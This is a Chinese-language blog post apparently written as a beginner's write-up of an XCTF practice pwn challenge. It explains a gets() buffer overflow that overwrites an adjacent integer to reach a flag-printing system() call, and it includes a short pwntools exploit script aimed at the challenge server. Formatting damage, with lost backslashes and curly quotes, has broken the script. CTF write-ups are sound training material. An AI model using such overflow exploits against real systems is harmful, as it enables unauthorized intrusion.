CTF，第一题

Posted 2020-12-06 suanguade

https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5051&page=1

呃，这题是xctf 上的练习题

 

我第一次搞这个，所以还不太懂界面上的都是什么，浪费了太多时间。

 

 

 

界面是这样的，乱七八糟一堆信息，但是实际上只有下面两个框里面的东西有用。

 

题目附件就是目标要干掉的软件，软件是运行在Linux 下的。

题目场景是目标软件在云服务器上的题目接口，用来取flag的。

主要流程是，先根据本地程序分析题目要求，然后做出针对，

最后用针对方法，从场景中，拿到结果。

 

大致就是这样。

 

今天第一题，从头开始吧。看起来不难，但是具体，谁知道呢。

题目很简单，

这是全部结果，弄IDA里面看看。

 

 

 

逻辑很简单，输入一个数字，这个数字如果等于1926，就结束了，

如果不等于1926，输入名字，然后就SB了，这里又要求必须等于1926才给结果，

system 句，其实是输出一个文件的内容，显然flag 在文件里面，

前面要求不能等于1926，后面又要求必须等于1926，吃饱了撑的。

怎么解决，怎么解决，怎么解决。

 

其实好解决，

针对本题，在询问名字之后，它后面接收名字的buffer 竟然只是一个char，而且没有做长度校验，

本题中接收数字的v5和接收年龄的v4挨着，看一眼汇编，啥情况

 

 情况就是这样，一个 ebp - 0x20，一个 ebp - 0x18

接收名字的buffer 在前面，是 -0x20，接收数字的buffer 是 -0x18，在后面，

而gets 写内存又是从前向后写的，而gets又没有判断内存长度，

所以好办了。我想办法构造一个特殊的字符串，让 -0x20 接收字符串的时候可以直接覆盖后面的数字，改变数字的值变成前面需要的1926，

大致就是做到一个缓冲区溢出的效果。

 

差不多吧。

使用python尝试一下。

 1 from pwn import *
 2 
 3 #a = process("./24ac28ef281b4b6caab44d6d52b17491")
 4 a = remote(‘124.126.19.106‘, 41549)
 5 r = a.recvuntil("What‘s Your Birth?
")
 6 print(r)
 7 a.send("123
")
 8 r = a.recvuntil(‘
‘)
 9 print(r)
10 
11 str = "A" * 8 + "x86x07x00x00"
12 print(str)
13 a.send(str);
14 
15 a.interactive()

代码就是这样，导入pwn 库，

然后连接远程服务器，接收第一个标准字符串，

之后，上报给服务器一个错误的数字，

等待服务器返回，输出服务器返回的文字，直到 ，

然后构造一个特殊的字符串了，

由于之前看到了，-0x20到 -0x18 中间相差8个字节，

所以名字的前8个字节可以为任意字符，

之后由于数字是个int 型，不是 int64，其实构造成int64也可以，但是没必要，

将1926转换成 16进制就是 0x786，按照小端排序，将数字重整，

然后追加到字符串之后，发送给服务器，

最后补一个信息接收，效果

 

 

 

我输入的被全收了，答案也就出来了。哎，第一次，墨迹墨迹墨迹太久，希望下次不会墨迹太久。。。

 

天太晚了，睡觉。